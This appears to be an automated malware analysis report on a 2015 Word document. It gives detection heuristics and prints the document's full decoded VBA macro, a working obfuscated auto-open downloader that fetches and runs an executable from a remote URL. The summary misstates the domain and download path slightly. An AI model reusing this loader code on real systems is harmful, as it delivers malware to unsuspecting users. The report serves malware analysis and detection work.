Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c91578a76f099b31…

MALICIOUS

Office (OLE)

30.5 KB Created: 2015-01-19 10:28:00 Authoring application: Microsoft Office Word First seen: 2015-02-17
MD5: f9d2458458dd49e9ce7c9894c540c4d5 SHA-1: 8322901f799749042077030eeb248d80f9187e93 SHA-256: c91578a76f099b311eecc51bf9511e8de366272b1638a82b75208b89f9053932
256 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information T1071.001 Web Protocols T1204.002 Malicious File

The critical heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' indicates an obfuscated auto-exec VBA loader. The VBA script contains a function 'JyXsorj' that decodes a Base64 string and uses 'CreateObject' to download a file from the reconstructed URL 'http://stylishmaldive.com/js/bin.exe' to the path 'C:\Windows\Temp\GlHdsf.exe', which is then likely executed. The 'autoopen' subroutine triggers this malicious behavior upon opening the document.

Heuristics 8

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set hUIGGYdfg = CreateObject(NsCj(jSr7Aw))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set hUIGGYdfg = CreateObject(NsCj(jSr7Aw))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    sdfsdfsd.Open Environ(NsCj(aXpVWjFOR)) & NsCj(WbqiAH)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2920 bytes
SHA-256: 24b5c0e6db7be2f7542b69d798efeb41b841f9de88730f0fe32a92176c18ded4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const DYAVRU2O7CQK = "XGlIR2RzZi5leGU="
Private Const u4UPbupdHqn = "VEVNUA=="
Private Const JGYEERm = "aHR0cDovL3N0eWxpc2htYWxkaXZlcy5jb20vanMvYmluLmV4ZQ=="
Private Const WbqiAH = DYAVRU2O7CQK
Private Const aXpVWjFOR = u4UPbupdHqn
Private Const UUMbhwG = "U2hlbGwuQXBwbGljYXRpb24="
Private Const s1tNlT1AWf = ""
Private Const FTKZS = "R0VU"
Private Const jSr7Aw = "TVNYTUwyLlhNTEhUVFA="
Private Const LZKV = ""
Private Const JLR = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

Sub iwpHOuE6r()
 nJFIm
End Sub
Sub eODC7ApCVQ()
     iwpHOuE6r
End Sub
Sub autoopen()
     iwpHOuE6r
End Sub
Function JyXsorj(ByVal sdfwefwef As String, ByVal pNJKBjkdsf As String) As Boolean
    Dim hUIGGYdfg As Object, i As Long, GYUbjsdf As Long, hjjjjjb() As Byte
     

    Set hUIGGYdfg = CreateObject(NsCj(jSr7Aw))
    hUIGGYdfg.Open NsCj(FTKZS), sdfwefwef, False
    hUIGGYdfg.Send

hjjjjjb = hUIGGYdfg.responseBody

    GYUbjsdf = FreeFile
    Open pNJKBjkdsf For Binary Access Write As #GYUbjsdf
    Put #GYUbjsdf, , hjjjjjb
    Close #GYUbjsdf

    Set hUIGGYdfg = Nothing

Set sdfsdfsd = CreateObject(NsCj(UUMbhwG))
sdfsdfsd.Open Environ(NsCj(aXpVWjFOR)) & NsCj(WbqiAH)
    End Function
Sub nJFIm()
FFewr43 = NsCj(JGYEERm)
     JyXsorj FFewr43, Environ(NsCj(aXpVWjFOR)) & NsCj(WbqiAH)

End Sub
Public Function NsCj(strInput As String) As String

On Error Resume Next
On Local Error Resume Next
Dim arrChars64() As Byte
Dim arrChars64Rev() As Byte
Dim arrInput() As Byte
Dim arrOutput() As Byte
Dim arrChar(4) As Integer
Dim intLen As Long
Dim intDelta As Long
Dim i As Long
Dim j As Long
Const Base64 = JLR
arrChars64() = StrConv(Base64, vbFromUnicode)
ReDim arrChars64Rev(255)
For i = 0 To UBound(arrChars64)
arrChars64Rev(arrChars64(i)) = i
Next i
intLen = Len(strInput)
If intLen = 0 Then Exit Function
intDelta = intLen Mod 4
If intDelta > 0 Then
strInput = strInput + String$(4 - intDelta, 0)
intLen = Len(strInput)
End If
arrInput() = StrConv(strInput, vbFromUnicode)
ReDim arrOutput(((intLen + 1) / 4) * 3)
For i = 0 To UBound(arrInput) Step 4
arrChar(1) = arrChars64Rev(arrInput(i))
arrChar(2) = arrChars64Rev(arrInput(i + 1))
arrChar(3) = arrChars64Rev(arrInput(i + 2))
arrChar(4) = arrChars64Rev(arrInput(i + 3))
arrOutput(j) = ((arrChar(1) * 4 + Int(arrChar(2) / 16)) And 255)
j = j + 1
arrOutput(j) = ((arrChar(2) * 16 + Int(arrChar(3) / 4)) And 255)
j = j + 1
arrOutput(j) = ((arrChar(3) * 64 + arrChar(4)) And 255)
j = j + 1
Next
 NsCj = Replace(StrConv(arrOutput, vbUnicode), vbNullChar, "")
End Function